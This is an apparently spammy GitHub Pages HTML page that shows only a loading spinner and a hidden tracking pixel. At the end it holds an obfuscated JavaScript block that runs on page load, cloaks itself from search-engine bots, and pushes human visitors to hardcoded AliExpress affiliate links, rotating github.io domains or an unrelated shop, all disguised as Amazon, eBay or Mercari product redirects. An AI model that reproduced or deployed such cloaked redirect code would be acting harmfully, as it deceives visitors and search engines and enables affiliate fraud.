<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta name="robots" content="index, follow"/>
  <style>
    :after,:before {
      box-sizing: border-box;
      border: 0 solid #e5e7eb
    }

    :after,:before {
      --tw-content: ""
    }

    :host,html {
      line-height: 1.5;
      -webkit-text-size-adjust: 100%;
      -moz-tab-size: 4;
      -o-tab-size: 4;
      tab-size: 4;
      font-family: ui-sans-serif,system-ui,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;
      font-feature-settings: normal;
      font-variation-settings: normal;
      -webkit-tap-highlight-color: transparent
    }

    body {
      margin: 0;
      line-height: inherit
    }

    hr {
      height: 0;
      color: inherit;
      border-top-width: 1px
    }

    abbr:where([title]) {
      -webkit-text-decoration: underline dotted;
      text-decoration: underline dotted
    }

    h1,h2,h3,h4,h5,h6 {
      font-size: inherit;
      font-weight: inherit
    }

    a {
      color: inherit;
      text-decoration: inherit
    }

    b,strong {
      font-weight: bolder
    }

    code,kbd,pre,samp {
      font-family: ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace;
      font-feature-settings: normal;
      font-variation-settings: normal;
      font-size: 1em
    }

    small {
      font-size: 80%
    }

    sub,sup {
      font-size: 75%;
      line-height: 0;
      position: relative;
      vertical-align: initial
    }

    sub {
      bottom: -.25em
    }

    sup {
      top: -.5em
    }

    table {
      text-indent: 0;
      border-color: inherit;
      border-collapse: collapse
    }

    button,input,optgroup,select,textarea {
      font-family: inherit;
      font-feature-settings: inherit;
      font-variation-settings: inherit;
      font-size: 100%;
      font-weight: inherit;
      line-height: inherit;
      letter-spacing: inherit;
      color: inherit;
      margin: 0;
      padding: 0
    }

    button,select {
      text-transform: none
    }

    button,input:where([type=button]),input:where([type=reset]),input:where([type=submit]) {
      -webkit-appearance: button;
      background-color: initial;
      background-image: none
    }

    :-moz-focusring {
      outline: auto
    }

    :-moz-ui-invalid {
      box-shadow: none
    }

    progress {
      vertical-align: initial
    }

    ::-webkit-inner-spin-button,::-webkit-outer-spin-button {
      height: auto
    }

    [type=search] {
      -webkit-appearance: textfield;
      outline-offset: -2px
    }

    ::-webkit-search-decoration {
      -webkit-appearance: none
    }

    ::-webkit-file-upload-button {
      -webkit-appearance: button;
      font: inherit
    }

    summary {
      display: list-item
    }

    blockquote,dd,dl,figure,h1,h2,h3,h4,h5,h6,hr,p,pre {
      margin: 0
    }

    fieldset {
      margin: 0
    }

    fieldset,legend {
      padding: 0
    }

    menu,ol,ul {
      list-style: none;
      margin: 0;
      padding: 0
    }

    dialog {
      padding: 0
    }

    textarea {
      resize: vertical
    }

    input::-moz-placeholder,textarea::-moz-placeholder {
      opacity: 1;
      color: #9ca3af
    }

    input::placeholder,textarea::placeholder {
      opacity: 1;
      color: #9ca3af
    }

    [role=button],button {
      cursor: pointer
    }

    :disabled {
      cursor: default
    }

    audio,canvas,embed,iframe,img,object,svg,video {
      display: block;
      vertical-align: middle
    }

    img,video {
      max-width: 100%;
      height: auto
    }

    [hidden] {
      display: none
    }

    *,::backdrop,:after,:before {
      --tw-border-spacing-x: 0;
      --tw-border-spacing-y: 0;
      --tw-translate-x: 0;
      --tw-translate-y: 0;
      --tw-rotate: 0;
      --tw-skew-x: 0;
      --tw-skew-y: 0;
      --tw-scale-x: 1;
      --tw-scale-y: 1;
      --tw-pan-x: ;
      --tw-pan-y: ;
      --tw-pinch-zoom: ;
      --tw-scroll-snap-strictness: proximity;
      --tw-gradient-from-position: ;
      --tw-gradient-via-position: ;
      --tw-gradient-to-position: ;
      --tw-ordinal: ;
      --tw-slashed-zero: ;
      --tw-numeric-figure: ;
      --tw-numeric-spacing: ;
      --tw-numeric-fraction: ;
      --tw-ring-inset: ;
      --tw-ring-offset-width: 0px;
      --tw-ring-offset-color: #fff;
      --tw-ring-color: #3b82f680;
      --tw-ring-offset-shadow: 0 0 #0000;
      --tw-ring-shadow: 0 0 #0000;
      --tw-shadow: 0 0 #0000;
      --tw-shadow-colored: 0 0 #0000;
      --tw-blur: ;
      --tw-brightness: ;
      --tw-contrast: ;
      --tw-grayscale: ;
      --tw-hue-rotate: ;
      --tw-invert: ;
      --tw-saturate: ;
      --tw-sepia: ;
      --tw-drop-shadow: ;
      --tw-backdrop-blur: ;
      --tw-backdrop-brightness: ;
      --tw-backdrop-contrast: ;
      --tw-backdrop-grayscale: ;
      --tw-backdrop-hue-rotate: ;
      --tw-backdrop-invert: ;
      --tw-backdrop-opacity: ;
      --tw-backdrop-saturate: ;
      --tw-backdrop-sepia: ;
      --tw-contain-size: ;
      --tw-contain-layout: ;
      --tw-contain-paint: ;
      --tw-contain-style:
    }

    .mx-auto {
      margin-left: auto;
      margin-right: auto
    }

    .flex {
      display: flex
    }

    .hidden {
      display: none
    }

    .h-8 {
      height: 2rem
    }

    .h-screen {
      height: 100vh
    }

    .w-8 {
      width: 2rem
    }

    .max-w-2xl {
      max-width: 42rem
    }

    @keyframes spin {
      to {
        transform: rotate(1turn)
      }
    }

    .animate-spin {
      animation: spin 1s linear infinite
    }

    .flex-wrap {
      flex-wrap: wrap
    }

    .items-center {
      align-items: center
    }

    .justify-center {
      justify-content: center
    }

    .gap-2 {
      gap: .5rem
    }

    .fill-gray-300 {
      fill: #d1d5db
    }

    .px-4 {
      padding-left: 1rem;
      padding-right: 1rem
    }

    .lowercase {
      text-transform: lowercase
    }

    .text-gray-400 {
      --tw-text-opacity: 1;
      color: rgb(156 163 175/var(--tw-text-opacity))
    }

    .text-gray-800 {
      --tw-text-opacity: 1;
      color: rgb(31 41 55/var(--tw-text-opacity))
    }

    .filter {
      filter: var(--tw-blur) var(--tw-brightness) var(--tw-contrast) var(--tw-grayscale) var(--tw-hue-rotate) var(--tw-invert) var(--tw-saturate) var(--tw-sepia) var(--tw-drop-shadow)
    }
  </style>
  
  <title></title>
<link rel='sitemap' type='application/gzip' title='Sitemap' href='https://vahurlkmnislam.github.io/JXV/JXV101.txt.gz'/>
<link rel='sitemap' type='application/gzip' title='Sitemap' href='https://vahurlkmnislam.github.io/JXV/JXV102.txt.gz'/>
<link rel='sitemap' type='application/gzip' title='Sitemap' href='https://vahurlkmnislam.github.io/JXV/JXV103.txt.gz'/>
<link rel='sitemap' type='application/gzip' title='Sitemap' href='https://vahurlkmnislam.github.io/JXV/JXV104.txt.gz'/>
<link rel='sitemap' type='application/gzip' title='Sitemap' href='https://vahurlkmnislam.github.io/JXV/JXV105.txt.gz'/>
<link rel='sitemap' type='application/gzip' title='Sitemap' href='https://vahurlkmnislam.github.io/JXV/JXV106.txt.gz'/>
<link rel='sitemap' type='application/gzip' title='Sitemap' href='https://vahurlkmnislam.github.io/JXV/JXV107.txt.gz'/>
<link rel='sitemap' type='application/gzip' title='Sitemap' href='https://vahurlkmnislam.github.io/JXV/JXV108.txt.gz'/>
<link rel='sitemap' type='application/gzip' title='Sitemap' href='https://vahurlkmnislam.github.io/JXV/JXV109.txt.gz'/>
<link rel='sitemap' type='application/gzip' title='Sitemap' href='https://vahurlkmnislam.github.io/JXV/JXV110.txt.gz'/>

  
  
  
  
  

<!--  -->
<!--  -->
</head>
<body id="content" class="mx-auto max-w-2xl px-4 text-gray-800 h-screen flex flex-wrap gap-2 justify-center items-center">
<div role="status" class="loading">
  <svg aria-hidden="true" class="w-8 h-8 text-gray-400 animate-spin fill-gray-300" viewbox="0 0 100 100" fill="none" xmlns="http://www.w3.org/2000/svg">
    <path d="M100 50.5908C100 78.2051 77.6142 100.591 50 100.591C22.3858 100.591 0 78.2051 0 50.5908C0 22.9766 22.3858 0.59082 50 0.59082C77.6142 0.59082 100 22.9766 100 50.5908ZM9.08144 50.5908C9.08144 73.1895 27.4013 91.5094 50 91.5094C72.5987 91.5094 90.9186 73.1895 90.9186 50.5908C90.9186 27.9921 72.5987 9.67226 50 9.67226C27.4013 9.67226 9.08144 27.9921 9.08144 50.5908Z" fill="currentColor"/>
    <path d="M93.9676 39.0409C96.393 38.4038 97.8624 35.9116 97.0079 33.5539C95.2932 28.8227 92.871 24.3692 89.8167 20.348C85.8452 15.1192 80.8826 10.7238 75.2124 7.41289C69.5422 4.10194 63.2754 1.94025 56.7698 1.05124C51.7666 0.367541 46.6976 0.446843 41.7345 1.27873C39.2613 1.69328 37.813 4.19778 38.4501 6.62326C39.0873 9.04874 41.5694 10.4717 44.0505 10.1071C47.8511 9.54855 51.7191 9.52689 55.5402 10.0491C60.8642 10.7766 65.9928 12.5457 70.6331 15.2552C75.2735 17.9648 79.3347 21.5619 82.5849 25.841C84.9175 28.9121 86.7997 32.2913 88.1811 35.8758C89.083 38.2158 91.5421 39.6781 93.9676 39.0409Z" fill="currentFill"/>
  </svg>
</div>
<div style="display: none;" aria-hidden="true">
  <img src="//sstatic1.histats.com/0.gif?4897480&amp;101" alt="Counter" width="0" height="0" title="Counter" class="hidden" border="0"/>
</div>
<script type="text/javascript">
  const _0x3054=['?aff_short_key=','join','substring','hostname','replace','title','reverse','search','Opera','/itm/','includes','.aliexpress.com/item/i/','Trident','href','Chrome','abs','Edge','referrer','https://s.click.aliexpress.com/deep_link.htm?aff_short_key=','https://s.click.aliexpress.com/deep_link.htm?aff_short_key=_DBtsUQn&dp=','&dp=','com','length','_DBEsyp3','charCodeAt','split','userAgent','?aff_short_key=_DBtsUQn&dp=','https://','abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ','&dl_target_url='];const _0x1add=function(_0x30545e,_0x1add9f){_0x30545e=_0x30545e-0x0;let _0x535aaa=_0x3054[_0x30545e];return _0x535aaa;};const origin='qianyigitll,qianyigi,hdsjadhs';let key=_0x1add('0x17');const _0x4gf192=window['location']['hostname'][_0x1add('0x19')]('.');document[_0x1add('0x5')]=_0x4gf192[0x0];if(window['location']['search']['includes']('?')){if(/github/g['test'](document['referrer'])){action(key);}else{let prex=window['location'][_0x1add('0x7')]['split']('?');pindahan(domains(origin,prex[0x1][_0x1add('0x4')](/[^a-z0-9]/g,'')));}}function pindahan(_0x28d988){let _0x43ca96=navigator['userAgent']['toLowerCase']();let _0x533e49=document[_0x1add('0x11')];let _0x3552f5=window['location'][_0x1add('0x3')];let _0x4516dc=window['location'][_0x1add('0x7')]['split']('?');let _0x2099f9='';if(_0x4516dc[0x1][_0x1add('0xa')]('=')){new_target=_0x4516dc[0x1]['replace']('=','+');}else if(_0x4516dc[0x1]['includes']('+')){new_target=_0x4516dc[0x1][_0x1add('0x4')]('+','-');}else if(_0x4516dc[0x1][_0x1add('0xa')]('-')){new_target=_0x4516dc[0x1][_0x1add('0x4')]('-','~');}else if(_0x4516dc[0x1]['includes']('~')){new_target=_0x4516dc[0x1][_0x1add('0x4')]('~','_');}else if(_0x4516dc[0x1][_0x1add('0xa')]('_')){new_target=_0x4516dc[0x1]['replace']('_','&');}else if(_0x4516dc[0x1][_0x1add('0xa')]('&')){new_target=_0x4516dc[0x1]['replace']('&','/');}else if(_0x4516dc[0x1][_0x1add('0xa')]('/')){new_target=_0x4516dc[0x1]['replace']('/','(');}else if(_0x4516dc[0x1]['includes']('(')){new_target=_0x4516dc[0x1][_0x1add('0x4')]('(',')');}else if(_0x4516dc[0x1][_0x1add('0xa')](')')){new_target=_0x4516dc[0x1][_0x1add('0x4')](')',':');}else if(_0x4516dc[0x1]['includes'](':')){new_target=_0x4516dc[0x1]['replace'](':','.');}else if(_0x4516dc[0x1][_0x1add('0xa')]('.')){new_target=_0x4516dc[0x1]['replace']('.','=');}{new_target=_0x4516dc[0x1];}location[_0x1add('0xd')]=_0x1add('0x1c')+_0x28d988+'/?'+new_target;}function action(_0x4b4160){let _0x1e7918=navigator[_0x1add('0x1a')]['toLowerCase']();let _0xcaedb8=document[_0x1add('0x11')];let _0x5b7c62=window['location'][_0x1add('0x3')];let _0xddbb98=window['location'][_0x1add('0x7')]['split']('?');let _0xa30248='';if(_0xddbb98[0x1][_0x1add('0xa')]('|')){_0xa30248='jp';}else if(_0xddbb98[0x1]['includes']('=')){_0xa30248='he';}else if(_0xddbb98[0x1][_0x1add('0xa')]('+')){_0xa30248='ja';}else if(_0xddbb98[0x1]['includes']('-')){_0xa30248='ko';}else if(_0xddbb98[0x1]['includes']('~')){_0xa30248='pt';}else if(_0xddbb98[0x1]['includes']('_')){_0xa30248='es';}else if(_0xddbb98[0x1]['includes']('&')){_0xa30248='fr';}else if(_0xddbb98[0x1][_0x1add('0xa')]('/')){_0xa30248='de';}else if(_0xddbb98[0x1]['includes']('(')){_0xa30248='it';}else if(_0xddbb98[0x1][_0x1add('0xa')](')')){_0xa30248='nl';}else if(_0xddbb98[0x1][_0x1add('0xa')](':')){_0xa30248='ar';}else if(_0xddbb98[0x1]['includes']('.')){_0xa30248='pl';}else{_0xa30248=_0x1add('0x15');}let _0x219800=!![];if(/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|facebook|yandex|spider|bytedance|ali/i['test'](_0x1e7918)||_0xcaedb8===''){_0x219800=![];}if(_0xddbb98[0x1]['includes']('$')){let _0x1c254e=_0xddbb98[0x1]['replace'](/[^a-zA-Z0-9]/g,'');let _0x3a59ef=_0x1c254e['substring'](0x0,_0x1c254e['length']);let _0x38ed0e='https://www.amazon.co.'+_0xa30248+'/dp/'+_0x3a59ef;if(_0x219800===!![]){_0x38ed0e=_0x1add('0x12')+_0x4b4160+_0x1add('0x14')+_0x5b7c62+'&dl_target_url='+_0x38ed0e;}else{_0x38ed0e=_0x1add('0x13')+_0x5b7c62+'&dl_target_url='+_0x38ed0e;}location[_0x1add('0xd')]=_0x38ed0e;}else if(_0xddbb98[0x1][_0x1add('0xa')]('@')){let _0x7aee57=_0x1add('0x1d');let _0xe42c76=arrayUnique(_0x7aee57['split'](''));let _0x17a4e9=_0xe42c76[_0x1add('0x1')]('');let _0x5ffca9=_0xddbb98[0x1][_0x1add('0x4')](/[^a-zA-Z0-9]/g,'');let _0x5c301e=base62Decode(_0x5ffca9,_0x7aee57);let _0x4c087e='https://www.ebay.'+_0xa30248+_0x1add('0x9')+_0x5c301e;if(_0x219800===!![]){const _0x2a0c9b=navigator['userAgent'];let _0x1237aa=isBrowserUserAgent(_0x2a0c9b);if(_0x1237aa){_0x4c087e='https://www.kjawrbeauty.shop/?sk='+_0x5c301e+'&pa=e';_0x4c087e=_0x4c087e+'?aff_short_key='+_0x4b4160+'&dp='+_0x5b7c62+'&dl_target_url='+_0x4c087e;}else{_0x4c087e=_0x4c087e+'?aff_short_key='+_0x4b4160+_0x1add('0x14')+_0x5b7c62+'&dl_target_url='+_0x4c087e;}}else{_0x4c087e=_0x4c087e+'?aff_short_key=_DBtsUQn&dp='+_0x5b7c62+_0x1add('0x1e')+_0x4c087e;}location['href']=_0x4c087e;}else if(_0xddbb98[0x1]['includes']('{')){let _0x1f348d='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';let _0x52825f=arrayUnique(_0x1f348d[_0x1add('0x19')](''));let _0xa4fdf=_0x52825f[_0x1add('0x1')]('');let _0x2ccc19=_0xddbb98[0x1][_0x1add('0x4')](/[^a-zA-Z0-9]/g,'');let _0x224016=_0x2ccc19[_0x1add('0x2')](0x0,_0x2ccc19[_0x1add('0x16')]-0x1);let _0xadea73=base62Decode(_0x224016,_0x1f348d);let _0x591611=_0x1add('0x1c')+_0xa30248+'.mercari.com/item/m'+_0xadea73;if(_0x219800===!![]){const _0xc1af9d=navigator[_0x1add('0x1a')];let _0x33d7af=isBrowserUserAgent(_0xc1af9d);if(_0x33d7af){_0x591611='https://www.kjawrbeauty.shop/?sk=m'+_0xadea73+'&pa=m';_0x591611=_0x591611+'?aff_short_key='+_0x4b4160+'&dp='+_0x5b7c62+'&dl_target_url='+_0x591611;}else{_0x591611=_0x591611+_0x1add('0x0')+_0x4b4160+'&dp='+_0x5b7c62+'&dl_target_url='+_0x591611;}}else{_0x591611=_0x591611+_0x1add('0x1b')+_0x5b7c62+_0x1add('0x1e')+_0x591611;}location[_0x1add('0xd')]=_0x591611;}else{let _0x599d95='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';let _0x4c2737=arrayUnique(_0x599d95[_0x1add('0x19')](''));let _0x48e724=_0x4c2737['join']('');let _0x13a34c=_0xddbb98[0x1][_0x1add('0x4')](/[^a-zA-Z0-9]/g,'');let _0x1ca588=base62Decode(_0x13a34c,_0x599d95);let _0xd59dc8='https://'+_0xa30248+_0x1add('0xb')+_0x1ca588;if(_0x219800===!![]){_0xd59dc8='https://s.click.aliexpress.com/deep_link.htm?dp='+_0x5b7c62+'&dl_target_url='+_0xd59dc8;}else{_0xd59dc8='https://s.click.aliexpress.com/deep_link.htm?dp='+_0x5b7c62+'&dl_target_url='+_0xd59dc8;}location[_0x1add('0xd')]=_0xd59dc8;}}function base62Decode(_0x1cb31e,_0x4832da){_0x1cb31e=_0x1cb31e[_0x1add('0x19')]('')[_0x1add('0x6')]()[_0x1add('0x1')]('');let _0x4b56da=0x0;let _0x31d523=0x1;for(let _0x46db5e=_0x1cb31e[_0x1add('0x16')]-0x1;_0x46db5e>=0x0;_0x46db5e--){const _0x192c8e=_0x4832da['indexOf'](_0x1cb31e[_0x46db5e]);if(_0x192c8e===-0x1){throw new Error('Invalid\x20character\x20in\x20encoded\x20string');}_0x4b56da+=_0x192c8e*_0x31d523;_0x31d523*=0x3e;}return _0x4b56da;}function domains(_0x3881b7,_0x2f6736){let _0x388c45=_0x3881b7[_0x1add('0x19')](',');let _0x411aea=0x0;for(let _0x46f3b5=0x0;_0x46f3b5<_0x2f6736[_0x1add('0x16')];_0x46f3b5++){_0x411aea=0x1f*_0x411aea+_0x2f6736[_0x1add('0x18')](_0x46f3b5);}const _0x22c3f1=Math[_0x1add('0xf')](_0x411aea)%_0x388c45[_0x1add('0x16')];return _0x388c45[_0x22c3f1]+'.github.io';}function arrayUnique(_0x1739fe){return[...new Set(_0x1739fe)];}function isBrowserUserAgent(_0x380bc1){const _0x38d6b8=[_0x1add('0xe'),'Safari',_0x1add('0x8'),'MSIE',_0x1add('0xc'),_0x1add('0x10')];for(let _0x29f179 of _0x38d6b8){if(_0x380bc1[_0x1add('0xa')](_0x29f179)){return!![];}}return![];}
</script>
</body>
</html>


